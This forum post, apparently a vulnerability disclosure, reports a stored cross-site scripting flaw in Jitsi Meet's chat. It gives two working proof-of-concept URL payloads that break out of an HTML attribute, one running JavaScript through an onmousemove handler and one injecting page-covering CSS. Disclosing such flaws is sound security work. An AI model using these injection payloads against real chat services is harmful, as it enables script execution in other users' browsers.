[meet.jit.si] Stored XSS on meet.jit.si chat

meet

#1

Hello,

I found a stored Cross Site Scripting (XSS) vulnerability on Jitsi-Meet’s chat.

This url will broke the html tag.

http://foo@google.com

After fuzzing with this issue, here’s the PoC that will execute the javascript or inject css code:

# Execute javascript
http://foo@www.google.com/x"onmousemove=alert`xss`;////

# Inject CSS code
http://foo@www.google.com/x"style=position:absolute;top:0;left:0;width:100%;height:100%;background-color:red;////

Regards,

k1tten


XSS injection on Jitsi-Meet?
XSS injection on Jitsi-Meet?